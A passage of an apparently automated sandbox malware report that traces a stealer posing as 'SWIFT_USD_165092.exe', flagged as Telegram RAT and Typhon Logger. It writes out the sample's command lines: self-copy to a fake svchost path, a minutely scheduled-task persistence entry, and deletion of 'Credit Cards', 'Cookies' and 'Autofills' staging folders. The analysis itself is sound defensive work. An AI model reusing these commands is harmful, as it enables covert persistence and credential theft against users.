                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.399919891.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      General

                                                                                      Target ID:1
                                                                                      Start time:19:49:35
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      Imagebase:0x140000
                                                                                      File size:2164736 bytes
                                                                                      MD5 hash:22BA147ED50FF44941FE486426432115
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.524320725.00000000028A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_TyphonLogger, Description: Yara detected Typhon Logger, Source: 00000001.00000002.524320725.00000000028A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.524320725.0000000002841000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_TyphonLogger, Description: Yara detected Typhon Logger, Source: 00000001.00000002.519129931.0000000000722000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.519129931.0000000000722000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      General

                                                                                      Target ID:2
                                                                                      Start time:19:49:35
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:cmd.exe" /C mkdir "C:\Users\user\AppData\Roaming\svchost
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Target ID:3
                                                                                      Start time:19:49:36
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Target ID:4
                                                                                      Start time:19:49:36
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Target ID:5
                                                                                      Start time:19:49:36
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Target ID:6
                                                                                      Start time:19:49:36
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                                                                                      Imagebase:0xbf0000
                                                                                      File size:185856 bytes
                                                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Target ID:7
                                                                                      Start time:19:49:36
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:tasklist
                                                                                      Imagebase:0x950000
                                                                                      File size:79872 bytes
                                                                                      MD5 hash:6B7D2FC3FB98B10A5F77B23DEF745F6F
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:8
                                                                                      Start time:19:49:36
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:9
                                                                                      Start time:19:49:36
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:cmd.exe" /C copy "C:\Users\user\Desktop\SWIFT_USD_165092.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:10
                                                                                      Start time:19:49:36
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:11
                                                                                      Start time:19:49:37
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      Imagebase:0xac0000
                                                                                      File size:2164736 bytes
                                                                                      MD5 hash:22BA147ED50FF44941FE486426432115
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                      • Detection: 32%, ReversingLabs

                                                                                      General

                                                                                      Target ID:14
                                                                                      Start time:19:49:49
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      Imagebase:0x340000
                                                                                      File size:2164736 bytes
                                                                                      MD5 hash:22BA147ED50FF44941FE486426432115
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.651681057.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_TyphonLogger, Description: Yara detected Typhon Logger, Source: 0000000E.00000002.651681057.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000E.00000002.651681057.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                      General

                                                                                      Target ID:15
                                                                                      Start time:19:49:49
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:cmd.exe" /C mkdir "C:\Users\user\AppData\Roaming\svchost
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:16
                                                                                      Start time:19:49:49
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:17
                                                                                      Start time:19:49:49
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:18
                                                                                      Start time:19:49:49
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:19
                                                                                      Start time:19:49:50
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                                                                                      Imagebase:0xbf0000
                                                                                      File size:185856 bytes
                                                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:20
                                                                                      Start time:19:49:51
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:cmd.exe" /C copy "C:\Users\user\AppData\Roaming\svchost\svchost.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:21
                                                                                      Start time:19:49:52
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:22
                                                                                      Start time:19:49:53
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:tasklist
                                                                                      Imagebase:0x950000
                                                                                      File size:79872 bytes
                                                                                      MD5 hash:6B7D2FC3FB98B10A5F77B23DEF745F6F
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:23
                                                                                      Start time:19:49:53
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:24
                                                                                      Start time:19:49:59
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\msiexec.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                      Imagebase:0x7ff679930000
                                                                                      File size:66048 bytes
                                                                                      MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:25
                                                                                      Start time:19:50:18
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Credit Cards
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:26
                                                                                      Start time:19:50:18
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:27
                                                                                      Start time:19:50:18
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Cookies
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:28
                                                                                      Start time:19:50:18
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:29
                                                                                      Start time:19:50:18
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Autofills
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:30
                                                                                      Start time:19:50:19
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:31
                                                                                      Start time:19:50:19
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\404d522a-62f5-4eb2-91f4-202649d15261
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:32
                                                                                      Start time:19:50:19
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:33
                                                                                      Start time:19:50:26
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:34
                                                                                      Start time:19:50:26
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:37
                                                                                      Start time:19:50:28
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 3108
                                                                                      Imagebase:0x20000
                                                                                      File size:434592 bytes
                                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      General

                                                                                      Target ID:39
                                                                                      Start time:19:51:00
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      Imagebase:0x640000
                                                                                      File size:2164736 bytes
                                                                                      MD5 hash:22BA147ED50FF44941FE486426432115
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      General

                                                                                      Target ID:40
                                                                                      Start time:19:51:11
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      Imagebase:0x5b0000
                                                                                      File size:2164736 bytes
                                                                                      MD5 hash:22BA147ED50FF44941FE486426432115
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000028.00000002.650586670.0000000003241000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                      General

                                                                                      Target ID:41
                                                                                      Start time:19:51:11
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Credit Cards
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:42
                                                                                      Start time:19:51:11
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:cmd.exe" /C mkdir "C:\Users\user\AppData\Roaming\svchost
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:43
                                                                                      Start time:19:51:11
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:44
                                                                                      Start time:19:51:12
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:45
                                                                                      Start time:19:51:12
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:46
                                                                                      Start time:19:51:12
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:47
                                                                                      Start time:19:51:12
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                                                                                      Imagebase:0xbf0000
                                                                                      File size:185856 bytes
                                                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:48
                                                                                      Start time:19:51:13
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Cookies
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:49
                                                                                      Start time:19:51:14
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:cmd.exe" /C copy "C:\Users\user\AppData\Roaming\svchost\svchost.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:50
                                                                                      Start time:19:51:14
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:51
                                                                                      Start time:19:51:14
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:52
                                                                                      Start time:19:51:14
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Autofills
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:53
                                                                                      Start time:19:51:15
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:54
                                                                                      Start time:19:51:16
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:tasklist
                                                                                      Imagebase:0x950000
                                                                                      File size:79872 bytes
